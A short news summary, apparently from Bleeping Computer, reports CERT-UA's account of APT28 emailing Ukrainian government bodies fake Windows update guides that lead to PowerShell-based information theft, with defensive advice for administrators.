"Hackers Use Fake 'Windows Update' Guides to Target Ukrainian Govt"

According to the Computer Emergency Response Team of Ukraine (CERT-UA), Russian hackers are sending malicious emails to different government bodies with instructions on how to upgrade Windows in order to defend against cyber threats. The Russian state-sponsored hacking group APT28, also known as Fancy Bear, according to CERT-UA, sent these emails and impersonated system administrators of the targeted government entities to fool their targets. The attackers created Outlook email addresses using real employee identities obtained through unknown ways during the attack's preliminary stages. Rather than normal instructions for upgrading Windows systems, the emails direct recipients to run a PowerShell command. This command downloads a PowerShell script to the computer, imitating a Windows update procedure while simultaneously downloading a second PowerShell payload. The second-stage payload is an information-harvesting tool that uses the 'tasklist' and 'systeminfo' commands to capture data and send it through an HTTP request to a Mocky service Application Programming Interface (API). Mocky is a legitimate tool that allows users to produce custom HTTP responses, which APT28 used for data exfiltration in this case. System administrators should restrict the ability to launch PowerShell on critical workstations and monitor network traffic for connections to the Mocky service API. This article continues to discuss APT28 using fake Windows Update guides to target various Ukrainian government bodies.

Bleeping Computer reports "Hackers Use Fake 'Windows Update' Guides to Target Ukrainian Govt"